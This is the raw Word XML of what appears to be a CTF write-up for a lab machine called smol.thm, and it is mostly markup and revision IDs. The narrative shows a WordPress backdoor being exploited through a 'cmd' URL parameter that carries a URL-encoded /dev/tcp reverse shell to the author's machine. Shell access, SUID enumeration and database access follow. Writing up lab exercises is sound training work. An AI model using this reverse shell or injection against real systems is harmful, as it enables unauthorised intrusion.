      <w:r w:rsidR="00B5361C">
        <w:t>)”</w:t>
      </w:r>
      <w:r w:rsidR="00F03624">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00583CBA">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="007273E3">
        <w:t xml:space="preserve">egularly on </w:t>
      </w:r>
      <w:r w:rsidR="002C175A">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidR="007273E3">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007273E3">
        <w:t>do_action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007273E3">
        <w:t>(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C57E24">
        <w:t>admin_notices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C57E24">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="007273E3">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00264FBB">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="007D2212">
        <w:t xml:space="preserve">called </w:t>
      </w:r>
      <w:r w:rsidR="00272D68">
        <w:t xml:space="preserve">when it loads the </w:t>
      </w:r>
      <w:r w:rsidR="00F37E1E">
        <w:t>user dashboard</w:t>
      </w:r>
      <w:r w:rsidR="00AF710A">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A77305">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2A217" w14:textId="554AC7FD" w:rsidR="00803039" w:rsidRDefault="00803039" w:rsidP="001C06E8">
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="0061491E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I tried to </w:t>
      </w:r>
      <w:r w:rsidR="0088641D">
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:r w:rsidR="00CE45DB">
        <w:t>a basic</w:t>
      </w:r>
      <w:r w:rsidR="0088641D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD74F6">
        <w:t>command to ch</w:t>
      </w:r>
      <w:r w:rsidR="004C4CFC">
        <w:t xml:space="preserve">eck if it works and it </w:t>
      </w:r>
      <w:r w:rsidR="008E5E51">
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="0088641D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B557643" w14:textId="65E02DA6" w:rsidR="00886E32" w:rsidRDefault="004C4CFC" w:rsidP="001C06E8">
      <w:r w:rsidRPr="004C4CFC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="644427E6" wp14:editId="25BB804B">
            <wp:extent cx="4439035" cy="971634"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18860622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2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9035" cy="9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4B7E" w14:textId="088D5DD7" w:rsidR="004C4CFC" w:rsidRDefault="004C4CFC" w:rsidP="001C06E8">
      <w:r>
        <w:t>Then I entered this command in the url</w:t>
      </w:r>
      <w:r w:rsidR="009B338E">
        <w:t xml:space="preserve"> (I created t</w:t>
      </w:r>
      <w:r w:rsidR="00D82082">
        <w:t xml:space="preserve">he command using </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00D82082" w:rsidRPr="00090072">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Reverse Shell Generator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009B338E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E0C6E" w14:textId="4195F2DD" w:rsidR="00F03624" w:rsidRDefault="00090072" w:rsidP="004851DA">
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00B012EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.smol.thm/wp-admin/profile.php?cmd=sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F</w:t>
        </w:r>
        <w:r w:rsidRPr="00B012EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>_my_own_machine_ip_</w:t>
        </w:r>
        <w:r w:rsidRPr="00B012EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>%2F4444%200%3E%261</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34BB2CC1" w14:textId="00E55CE1" w:rsidR="00090072" w:rsidRDefault="00A77F13" w:rsidP="004851DA">
      <w:r>
        <w:t>And I got the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08994FE7" w14:textId="0065C32D" w:rsidR="00A77F13" w:rsidRDefault="003D10B1" w:rsidP="004851DA">
      <w:r w:rsidRPr="003D10B1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFD3D35" wp14:editId="40220C5F">
            <wp:extent cx="4305673" cy="876376"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17507129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2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72CF" w14:textId="1FF4B15F" w:rsidR="00601E0C" w:rsidRDefault="00B52DFF" w:rsidP="004851DA">
      <w:r>
        <w:t xml:space="preserve">From here, I navigated to </w:t>
      </w:r>
      <w:r w:rsidR="00591D07">
        <w:t xml:space="preserve">the “/home” directory and </w:t>
      </w:r>
      <w:r w:rsidR="0019152D">
        <w:t xml:space="preserve">saw all the available </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00651154">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00346C2E">
        <w:t xml:space="preserve"> directories</w:t>
      </w:r>
      <w:r w:rsidR="00792C10">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5CD0D" w14:textId="56E2A561" w:rsidR="00792C10" w:rsidRDefault="00792C10" w:rsidP="004851DA">
      <w:r w:rsidRPr="00792C10">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FEF5A39" wp14:editId="2C650A56">
            <wp:extent cx="3276884" cy="1238357"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3671600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600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2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C8A3" w14:textId="0C753856" w:rsidR="006E1244" w:rsidRDefault="008D5F21" w:rsidP="004851DA">
      <w:r>
        <w:t>I found here nothing accessible for me as “www-data</w:t>
      </w:r>
      <w:r w:rsidR="00096BAC">
        <w:t>”,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so I went </w:t>
      </w:r>
      <w:r w:rsidR="004D6D35">
        <w:t xml:space="preserve">to check for </w:t>
      </w:r>
      <w:r w:rsidR="00520A52">
        <w:t xml:space="preserve">vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00850D66">
        <w:t>SUID binaries</w:t>
      </w:r>
      <w:r w:rsidR="002E44A5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAA3BA" w14:textId="6D14ACAB" w:rsidR="002E44A5" w:rsidRDefault="009D2CB6" w:rsidP="004851DA">
      <w:r w:rsidRPr="009D2CB6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D311847" wp14:editId="6F7D34E1">
            <wp:extent cx="3703641" cy="2008044"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14555161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161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0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7F11" w14:textId="2A48976A" w:rsidR="008121F8" w:rsidRDefault="003F1F87" w:rsidP="004851DA">
      <w:r>
        <w:t xml:space="preserve">But here, I remembered that I </w:t>
      </w:r>
      <w:r w:rsidR="0017061B">
        <w:t xml:space="preserve">have the credentials of the database user </w:t>
      </w:r>
      <w:r w:rsidR="00B640B4">
        <w:t>so I can access the MySQL da</w:t>
      </w:r>
      <w:r w:rsidR="00C45981">
        <w:t>tabase using them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFF257" w14:textId="7333A16F" w:rsidR="00C45981" w:rsidRDefault="00842BA4" w:rsidP="004851DA">
      <w:r w:rsidRPr="00842BA4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC526CC" wp14:editId="0C6E232C">
            <wp:extent cx="4370449" cy="1905165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3107982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98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044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0A27" w14:textId="755088B0" w:rsidR="00BC28BA" w:rsidRDefault="000D6E54" w:rsidP="004851DA">
      <w:r>
        <w:t xml:space="preserve">Here I </w:t>
      </w:r>
      <w:r w:rsidR="00F625CE">
        <w:t xml:space="preserve">first of all </w:t>
      </w:r>
      <w:r w:rsidR="001F3696">
        <w:t xml:space="preserve">enumerate the </w:t>
      </w:r>
      <w:r w:rsidR="008A1301">
        <w:t>tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB637B" w14:textId="77777777" w:rsidR="008A1301" w:rsidRPr="00591ED9" w:rsidRDefault="008A1301" w:rsidP="004851DA"/>
    <w:sectPr w:rsidR="008A1301" w:rsidRPr="00591ED9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87"/>
    <w:rsid w:val="0000196F"/>
    <w:rsid w:val="00003188"/>
    <w:rsid w:val="00012DC8"/>
    <w:rsid w:val="00013689"/>
    <w:rsid w:val="00014649"/>
    <w:rsid w:val="00020B97"/>
    <w:rsid w:val="000228CD"/>
    <w:rsid w:val="00032D3A"/>
    <w:rsid w:val="0003335F"/>
    <w:rsid w:val="00036493"/>
    <w:rsid w:val="00037437"/>
    <w:rsid w:val="00041D42"/>
    <w:rsid w:val="00042B0D"/>
    <w:rsid w:val="00055465"/>
    <w:rsid w:val="00060067"/>
    <w:rsid w:val="00061FEE"/>
    <w:rsid w:val="00065C3E"/>
    <w:rsid w:val="00067E37"/>
    <w:rsid w:val="00070E24"/>
    <w:rsid w:val="00086267"/>
    <w:rsid w:val="00090072"/>
    <w:rsid w:val="00091FDA"/>
    <w:rsid w:val="00092ACD"/>
    <w:rsid w:val="00094B0E"/>
    <w:rsid w:val="00094E99"/>
    <w:rsid w:val="00096BAC"/>
    <w:rsid w:val="000973F9"/>
    <w:rsid w:val="000A0BFB"/>
    <w:rsid w:val="000A55C2"/>
    <w:rsid w:val="000B72CF"/>
    <w:rsid w:val="000C0ECE"/>
    <w:rsid w:val="000C5DDF"/>
    <w:rsid w:val="000C7DD9"/>
    <w:rsid w:val="000D66E0"/>
    <w:rsid w:val="000D6E54"/>
    <w:rsid w:val="000E6910"/>
    <w:rsid w:val="000F2A75"/>
    <w:rsid w:val="000F4A34"/>
    <w:rsid w:val="000F6E85"/>
    <w:rsid w:val="000F6E9B"/>
    <w:rsid w:val="001018D1"/>
    <w:rsid w:val="00101FDD"/>
    <w:rsid w:val="001021B8"/>
    <w:rsid w:val="001060CF"/>
    <w:rsid w:val="001061F7"/>
    <w:rsid w:val="00113121"/>
    <w:rsid w:val="0012482C"/>
    <w:rsid w:val="00124BA3"/>
    <w:rsid w:val="00130F81"/>
    <w:rsid w:val="00131353"/>
    <w:rsid w:val="00141552"/>
    <w:rsid w:val="00141D52"/>
    <w:rsid w:val="00143FCF"/>
    <w:rsid w:val="00144EE5"/>
    <w:rsid w:val="00150D3C"/>
    <w:rsid w:val="0015174A"/>
    <w:rsid w:val="0015360F"/>
    <w:rsid w:val="001540A0"/>
    <w:rsid w:val="00154DAF"/>
    <w:rsid w:val="00160CBB"/>
    <w:rsid w:val="001613BA"/>
    <w:rsid w:val="00164175"/>
    <w:rsid w:val="001660ED"/>
    <w:rsid w:val="00170289"/>
    <w:rsid w:val="0017061B"/>
    <w:rsid w:val="00170914"/>
    <w:rsid w:val="00177BB1"/>
    <w:rsid w:val="00182EE0"/>
    <w:rsid w:val="00186FF2"/>
    <w:rsid w:val="0019152D"/>
    <w:rsid w:val="00192935"/>
    <w:rsid w:val="00195661"/>
    <w:rsid w:val="001A267D"/>
    <w:rsid w:val="001A6BC2"/>
    <w:rsid w:val="001A7341"/>
    <w:rsid w:val="001B1E29"/>
    <w:rsid w:val="001C003B"/>
    <w:rsid w:val="001C06E8"/>
    <w:rsid w:val="001C0884"/>
    <w:rsid w:val="001C5CD7"/>
    <w:rsid w:val="001D5B76"/>
    <w:rsid w:val="001E0CD4"/>
    <w:rsid w:val="001E24A3"/>
    <w:rsid w:val="001F3696"/>
    <w:rsid w:val="001F70F2"/>
    <w:rsid w:val="00204A4A"/>
    <w:rsid w:val="00207535"/>
    <w:rsid w:val="002076E0"/>
    <w:rsid w:val="00211C69"/>
    <w:rsid w:val="002162BA"/>
    <w:rsid w:val="00221B78"/>
    <w:rsid w:val="00223729"/>
    <w:rsid w:val="0022559E"/>
    <w:rsid w:val="00226C42"/>
    <w:rsid w:val="00227BC6"/>
    <w:rsid w:val="0023757F"/>
    <w:rsid w:val="002404A3"/>
    <w:rsid w:val="00240D85"/>
    <w:rsid w:val="00242B1D"/>
    <w:rsid w:val="00251729"/>
    <w:rsid w:val="00255487"/>
    <w:rsid w:val="002607B6"/>
    <w:rsid w:val="00261102"/>
    <w:rsid w:val="00264FBB"/>
    <w:rsid w:val="002713E6"/>
    <w:rsid w:val="00272D68"/>
    <w:rsid w:val="0027573C"/>
    <w:rsid w:val="002774B7"/>
    <w:rsid w:val="002811B9"/>
    <w:rsid w:val="002942C7"/>
    <w:rsid w:val="002A3A8E"/>
    <w:rsid w:val="002A5664"/>
    <w:rsid w:val="002A6E81"/>
    <w:rsid w:val="002B4626"/>
    <w:rsid w:val="002B4D03"/>
    <w:rsid w:val="002B4DF0"/>
    <w:rsid w:val="002B5DEE"/>
    <w:rsid w:val="002B7AFA"/>
    <w:rsid w:val="002C175A"/>
    <w:rsid w:val="002C2517"/>
    <w:rsid w:val="002C506D"/>
    <w:rsid w:val="002C77D0"/>
    <w:rsid w:val="002D686F"/>
    <w:rsid w:val="002D6DC2"/>
    <w:rsid w:val="002E44A5"/>
    <w:rsid w:val="002E7C6D"/>
    <w:rsid w:val="003011B1"/>
    <w:rsid w:val="003053E9"/>
    <w:rsid w:val="00305726"/>
    <w:rsid w:val="00307B78"/>
    <w:rsid w:val="0031183A"/>
    <w:rsid w:val="003200E9"/>
    <w:rsid w:val="003244A2"/>
    <w:rsid w:val="003303E0"/>
    <w:rsid w:val="0033667F"/>
    <w:rsid w:val="00337E99"/>
    <w:rsid w:val="00342324"/>
    <w:rsid w:val="00346C2E"/>
    <w:rsid w:val="003509C0"/>
    <w:rsid w:val="0035606C"/>
    <w:rsid w:val="003661DB"/>
    <w:rsid w:val="0036647F"/>
    <w:rsid w:val="00367130"/>
    <w:rsid w:val="00367857"/>
    <w:rsid w:val="00373463"/>
    <w:rsid w:val="00373A15"/>
    <w:rsid w:val="00373DE2"/>
    <w:rsid w:val="00374DB5"/>
    <w:rsid w:val="003778EE"/>
    <w:rsid w:val="00382E05"/>
    <w:rsid w:val="003841CA"/>
    <w:rsid w:val="0038609B"/>
    <w:rsid w:val="00386471"/>
    <w:rsid w:val="00387530"/>
    <w:rsid w:val="0039128D"/>
    <w:rsid w:val="00395475"/>
    <w:rsid w:val="003A0E4A"/>
    <w:rsid w:val="003A3BBE"/>
    <w:rsid w:val="003B1844"/>
    <w:rsid w:val="003B26CC"/>
    <w:rsid w:val="003B2AB0"/>
    <w:rsid w:val="003B3BF9"/>
    <w:rsid w:val="003B4E19"/>
    <w:rsid w:val="003B6CE8"/>
    <w:rsid w:val="003C4377"/>
    <w:rsid w:val="003C58DB"/>
    <w:rsid w:val="003C68DB"/>
    <w:rsid w:val="003C6A8A"/>
    <w:rsid w:val="003C70B0"/>
    <w:rsid w:val="003C737B"/>
    <w:rsid w:val="003C7BB0"/>
    <w:rsid w:val="003D10B1"/>
    <w:rsid w:val="003D2A4E"/>
    <w:rsid w:val="003D6A3E"/>
    <w:rsid w:val="003D77E9"/>
    <w:rsid w:val="003E0AF3"/>
    <w:rsid w:val="003E12BA"/>
    <w:rsid w:val="003E1594"/>
    <w:rsid w:val="003E2CB8"/>
    <w:rsid w:val="003F1F87"/>
    <w:rsid w:val="0040145C"/>
    <w:rsid w:val="00402F91"/>
    <w:rsid w:val="00403103"/>
    <w:rsid w:val="00420063"/>
    <w:rsid w:val="0042164F"/>
    <w:rsid w:val="004278D7"/>
    <w:rsid w:val="00432F8C"/>
    <w:rsid w:val="00435371"/>
    <w:rsid w:val="00440695"/>
    <w:rsid w:val="004467F9"/>
    <w:rsid w:val="00447C38"/>
    <w:rsid w:val="00452269"/>
    <w:rsid w:val="004527A3"/>
    <w:rsid w:val="0045357C"/>
    <w:rsid w:val="00454BE2"/>
    <w:rsid w:val="00467AB1"/>
    <w:rsid w:val="00472476"/>
    <w:rsid w:val="00473F2A"/>
    <w:rsid w:val="00476874"/>
    <w:rsid w:val="004851DA"/>
    <w:rsid w:val="00485FFC"/>
    <w:rsid w:val="00486807"/>
    <w:rsid w:val="00486B40"/>
    <w:rsid w:val="00494195"/>
    <w:rsid w:val="00495035"/>
    <w:rsid w:val="004A054F"/>
    <w:rsid w:val="004A7711"/>
    <w:rsid w:val="004B0F9D"/>
    <w:rsid w:val="004C0E87"/>
    <w:rsid w:val="004C20B5"/>
    <w:rsid w:val="004C4CFC"/>
    <w:rsid w:val="004C5E82"/>
    <w:rsid w:val="004D2E9B"/>
    <w:rsid w:val="004D4660"/>
    <w:rsid w:val="004D6D35"/>
    <w:rsid w:val="004E0196"/>
    <w:rsid w:val="004E0EBA"/>
    <w:rsid w:val="004F1A4E"/>
    <w:rsid w:val="00502F06"/>
    <w:rsid w:val="00505F37"/>
    <w:rsid w:val="00515377"/>
    <w:rsid w:val="005176EB"/>
    <w:rsid w:val="00520A52"/>
    <w:rsid w:val="00524937"/>
    <w:rsid w:val="00530C0E"/>
    <w:rsid w:val="00531ADA"/>
    <w:rsid w:val="005333CD"/>
    <w:rsid w:val="00537F41"/>
    <w:rsid w:val="005445A6"/>
    <w:rsid w:val="00545478"/>
    <w:rsid w:val="0055142F"/>
    <w:rsid w:val="0055240A"/>
    <w:rsid w:val="005568AE"/>
    <w:rsid w:val="00565452"/>
    <w:rsid w:val="0057262B"/>
    <w:rsid w:val="00576A30"/>
    <w:rsid w:val="00581C2E"/>
    <w:rsid w:val="00583CBA"/>
    <w:rsid w:val="00590560"/>
    <w:rsid w:val="00591D07"/>
    <w:rsid w:val="00591ED9"/>
    <w:rsid w:val="005A1F6B"/>
    <w:rsid w:val="005B36EF"/>
    <w:rsid w:val="005B657C"/>
    <w:rsid w:val="005C217B"/>
    <w:rsid w:val="005C4F83"/>
    <w:rsid w:val="005C5D5D"/>
    <w:rsid w:val="005D22A6"/>
    <w:rsid w:val="005E4282"/>
    <w:rsid w:val="00601E0C"/>
    <w:rsid w:val="006071F6"/>
    <w:rsid w:val="00611EAE"/>
    <w:rsid w:val="0061375F"/>
    <w:rsid w:val="0061491E"/>
    <w:rsid w:val="00615F28"/>
    <w:rsid w:val="00624C7C"/>
    <w:rsid w:val="00625770"/>
    <w:rsid w:val="00625CE7"/>
    <w:rsid w:val="00627023"/>
    <w:rsid w:val="006278F8"/>
    <w:rsid w:val="00632458"/>
    <w:rsid w:val="006333C9"/>
    <w:rsid w:val="00633BF3"/>
    <w:rsid w:val="006361A6"/>
    <w:rsid w:val="006415F1"/>
    <w:rsid w:val="00650687"/>
    <w:rsid w:val="00650D81"/>
    <w:rsid w:val="00651154"/>
    <w:rsid w:val="00653D43"/>
    <w:rsid w:val="00661359"/>
    <w:rsid w:val="00674E83"/>
    <w:rsid w:val="00675197"/>
    <w:rsid w:val="00675F88"/>
    <w:rsid w:val="006775DD"/>
    <w:rsid w:val="0068049B"/>
    <w:rsid w:val="0068567D"/>
    <w:rsid w:val="006871D4"/>
    <w:rsid w:val="00693A3D"/>
    <w:rsid w:val="00693EE4"/>
    <w:rsid w:val="00696263"/>
    <w:rsid w:val="006A0792"/>
    <w:rsid w:val="006A0B72"/>
    <w:rsid w:val="006A22EB"/>
    <w:rsid w:val="006A2FDE"/>
    <w:rsid w:val="006A7DAB"/>
    <w:rsid w:val="006B2AC2"/>
    <w:rsid w:val="006B3D4D"/>
    <w:rsid w:val="006B41C4"/>
    <w:rsid w:val="006B5F29"/>
    <w:rsid w:val="006C1566"/>
    <w:rsid w:val="006C202B"/>
    <w:rsid w:val="006C2AB9"/>
    <w:rsid w:val="006C2B25"/>
    <w:rsid w:val="006C60EB"/>
    <w:rsid w:val="006D3120"/>
    <w:rsid w:val="006D40AD"/>
    <w:rsid w:val="006E1244"/>
    <w:rsid w:val="006F44A4"/>
    <w:rsid w:val="006F703B"/>
    <w:rsid w:val="00702863"/>
    <w:rsid w:val="0070443A"/>
    <w:rsid w:val="00705D9A"/>
    <w:rsid w:val="007145F8"/>
    <w:rsid w:val="00716D62"/>
    <w:rsid w:val="007170EC"/>
    <w:rsid w:val="00725153"/>
    <w:rsid w:val="00726088"/>
    <w:rsid w:val="007273E3"/>
    <w:rsid w:val="007275B4"/>
    <w:rsid w:val="00736FC9"/>
    <w:rsid w:val="0074070B"/>
    <w:rsid w:val="007528A8"/>
    <w:rsid w:val="00757D6A"/>
    <w:rsid w:val="00760822"/>
    <w:rsid w:val="0076189F"/>
    <w:rsid w:val="007623F6"/>
    <w:rsid w:val="007638B3"/>
    <w:rsid w:val="00764337"/>
    <w:rsid w:val="00773244"/>
    <w:rsid w:val="00781190"/>
    <w:rsid w:val="007859B2"/>
    <w:rsid w:val="00791969"/>
    <w:rsid w:val="00792C10"/>
    <w:rsid w:val="00794631"/>
    <w:rsid w:val="0079495A"/>
    <w:rsid w:val="007A1C81"/>
    <w:rsid w:val="007A6AA9"/>
    <w:rsid w:val="007A6BD7"/>
    <w:rsid w:val="007B1ED4"/>
    <w:rsid w:val="007B2E79"/>
    <w:rsid w:val="007B3DFC"/>
    <w:rsid w:val="007B5D61"/>
    <w:rsid w:val="007C1760"/>
    <w:rsid w:val="007C2B3A"/>
    <w:rsid w:val="007C4CF5"/>
    <w:rsid w:val="007C61C8"/>
    <w:rsid w:val="007D2212"/>
    <w:rsid w:val="007E5F6E"/>
    <w:rsid w:val="007E71F4"/>
    <w:rsid w:val="007F135C"/>
    <w:rsid w:val="007F1413"/>
    <w:rsid w:val="007F7EA7"/>
    <w:rsid w:val="00803039"/>
    <w:rsid w:val="008038A4"/>
    <w:rsid w:val="008121F8"/>
    <w:rsid w:val="00814488"/>
    <w:rsid w:val="00820EDF"/>
    <w:rsid w:val="00827DDC"/>
    <w:rsid w:val="00833326"/>
    <w:rsid w:val="00840198"/>
    <w:rsid w:val="00840A60"/>
    <w:rsid w:val="00842BA4"/>
    <w:rsid w:val="00850443"/>
    <w:rsid w:val="00850D66"/>
    <w:rsid w:val="008553D8"/>
    <w:rsid w:val="008604D9"/>
    <w:rsid w:val="00861325"/>
    <w:rsid w:val="00861483"/>
    <w:rsid w:val="008650C4"/>
    <w:rsid w:val="00871FCA"/>
    <w:rsid w:val="00872097"/>
    <w:rsid w:val="0087317E"/>
    <w:rsid w:val="008826A3"/>
    <w:rsid w:val="0088641D"/>
    <w:rsid w:val="00886D4F"/>
    <w:rsid w:val="00886E32"/>
    <w:rsid w:val="0089315B"/>
    <w:rsid w:val="0089560F"/>
    <w:rsid w:val="008A1301"/>
    <w:rsid w:val="008B0114"/>
    <w:rsid w:val="008C16F3"/>
    <w:rsid w:val="008D00A1"/>
    <w:rsid w:val="008D2368"/>
    <w:rsid w:val="008D4802"/>
    <w:rsid w:val="008D5250"/>
    <w:rsid w:val="008D5F21"/>
    <w:rsid w:val="008D61BC"/>
    <w:rsid w:val="008E163E"/>
    <w:rsid w:val="008E291F"/>
    <w:rsid w:val="008E5E51"/>
    <w:rsid w:val="008F2C6E"/>
    <w:rsid w:val="008F3078"/>
    <w:rsid w:val="008F4B3C"/>
    <w:rsid w:val="008F7276"/>
    <w:rsid w:val="009010F8"/>
    <w:rsid w:val="00912A5F"/>
    <w:rsid w:val="00913E35"/>
    <w:rsid w:val="00915972"/>
    <w:rsid w:val="00922107"/>
    <w:rsid w:val="0093733E"/>
    <w:rsid w:val="009410BF"/>
    <w:rsid w:val="00945289"/>
    <w:rsid w:val="00945FA7"/>
    <w:rsid w:val="00951205"/>
    <w:rsid w:val="00952057"/>
    <w:rsid w:val="00957EE2"/>
    <w:rsid w:val="00962E3D"/>
    <w:rsid w:val="00963A5F"/>
    <w:rsid w:val="00964361"/>
    <w:rsid w:val="00970677"/>
    <w:rsid w:val="00972FC4"/>
    <w:rsid w:val="00976703"/>
    <w:rsid w:val="00984816"/>
    <w:rsid w:val="009905BE"/>
    <w:rsid w:val="0099172D"/>
    <w:rsid w:val="00991E82"/>
    <w:rsid w:val="00992213"/>
    <w:rsid w:val="009A01A0"/>
    <w:rsid w:val="009A12F5"/>
    <w:rsid w:val="009A1CBE"/>
    <w:rsid w:val="009A4F39"/>
    <w:rsid w:val="009A7632"/>
    <w:rsid w:val="009B195F"/>
    <w:rsid w:val="009B31EA"/>
    <w:rsid w:val="009B338E"/>
    <w:rsid w:val="009B4963"/>
    <w:rsid w:val="009B4D7C"/>
    <w:rsid w:val="009B5EE8"/>
    <w:rsid w:val="009B716B"/>
    <w:rsid w:val="009B7A7D"/>
    <w:rsid w:val="009C3ABE"/>
    <w:rsid w:val="009C7ADC"/>
    <w:rsid w:val="009D0286"/>
    <w:rsid w:val="009D2CB6"/>
    <w:rsid w:val="009D5BCD"/>
    <w:rsid w:val="009D757C"/>
    <w:rsid w:val="009E042F"/>
    <w:rsid w:val="009E449D"/>
    <w:rsid w:val="009E6C86"/>
    <w:rsid w:val="009F0280"/>
    <w:rsid w:val="009F471F"/>
    <w:rsid w:val="009F5AC8"/>
    <w:rsid w:val="00A142B0"/>
    <w:rsid w:val="00A14E0F"/>
    <w:rsid w:val="00A23066"/>
    <w:rsid w:val="00A2784D"/>
    <w:rsid w:val="00A43836"/>
    <w:rsid w:val="00A4441E"/>
    <w:rsid w:val="00A4645B"/>
    <w:rsid w:val="00A55F6A"/>
    <w:rsid w:val="00A5697B"/>
    <w:rsid w:val="00A57454"/>
    <w:rsid w:val="00A6000F"/>
    <w:rsid w:val="00A65E6A"/>
    <w:rsid w:val="00A66F80"/>
    <w:rsid w:val="00A67880"/>
    <w:rsid w:val="00A7581D"/>
    <w:rsid w:val="00A75D07"/>
    <w:rsid w:val="00A77305"/>
    <w:rsid w:val="00A77F13"/>
    <w:rsid w:val="00A81D33"/>
    <w:rsid w:val="00A83557"/>
    <w:rsid w:val="00A90CE5"/>
    <w:rsid w:val="00AA5CF5"/>
    <w:rsid w:val="00AA7303"/>
    <w:rsid w:val="00AB6764"/>
    <w:rsid w:val="00AC2025"/>
    <w:rsid w:val="00AC3E90"/>
    <w:rsid w:val="00AC54F3"/>
    <w:rsid w:val="00AD3333"/>
    <w:rsid w:val="00AD50BC"/>
    <w:rsid w:val="00AD74F6"/>
    <w:rsid w:val="00AD79FA"/>
    <w:rsid w:val="00AF2734"/>
    <w:rsid w:val="00AF710A"/>
    <w:rsid w:val="00B00BFD"/>
    <w:rsid w:val="00B020D4"/>
    <w:rsid w:val="00B14ABB"/>
    <w:rsid w:val="00B16424"/>
    <w:rsid w:val="00B23217"/>
    <w:rsid w:val="00B248BC"/>
    <w:rsid w:val="00B25CF7"/>
    <w:rsid w:val="00B34596"/>
    <w:rsid w:val="00B379D3"/>
    <w:rsid w:val="00B403F8"/>
    <w:rsid w:val="00B4043E"/>
    <w:rsid w:val="00B45A5E"/>
    <w:rsid w:val="00B46B78"/>
    <w:rsid w:val="00B52B44"/>
    <w:rsid w:val="00B52DFF"/>
    <w:rsid w:val="00B52E81"/>
    <w:rsid w:val="00B5361C"/>
    <w:rsid w:val="00B54FCF"/>
    <w:rsid w:val="00B56C24"/>
    <w:rsid w:val="00B640B4"/>
    <w:rsid w:val="00B656AA"/>
    <w:rsid w:val="00B65B63"/>
    <w:rsid w:val="00B70910"/>
    <w:rsid w:val="00B7248D"/>
    <w:rsid w:val="00B830E1"/>
    <w:rsid w:val="00B83DF5"/>
    <w:rsid w:val="00B86EA6"/>
    <w:rsid w:val="00B91008"/>
    <w:rsid w:val="00B93EA9"/>
    <w:rsid w:val="00B97EA6"/>
    <w:rsid w:val="00BA3BDC"/>
    <w:rsid w:val="00BA6014"/>
    <w:rsid w:val="00BB41AC"/>
    <w:rsid w:val="00BC0977"/>
    <w:rsid w:val="00BC28BA"/>
    <w:rsid w:val="00BC4216"/>
    <w:rsid w:val="00BC5AFF"/>
    <w:rsid w:val="00BC6004"/>
    <w:rsid w:val="00BD25F6"/>
    <w:rsid w:val="00BD54CD"/>
    <w:rsid w:val="00BE5A4F"/>
    <w:rsid w:val="00BE6549"/>
    <w:rsid w:val="00BF23FD"/>
    <w:rsid w:val="00C01F64"/>
    <w:rsid w:val="00C15639"/>
    <w:rsid w:val="00C272EC"/>
    <w:rsid w:val="00C30737"/>
    <w:rsid w:val="00C31278"/>
    <w:rsid w:val="00C34151"/>
    <w:rsid w:val="00C35CD2"/>
    <w:rsid w:val="00C45981"/>
    <w:rsid w:val="00C45B92"/>
    <w:rsid w:val="00C47607"/>
    <w:rsid w:val="00C476DB"/>
    <w:rsid w:val="00C53AD6"/>
    <w:rsid w:val="00C556FE"/>
    <w:rsid w:val="00C57E24"/>
    <w:rsid w:val="00C678C4"/>
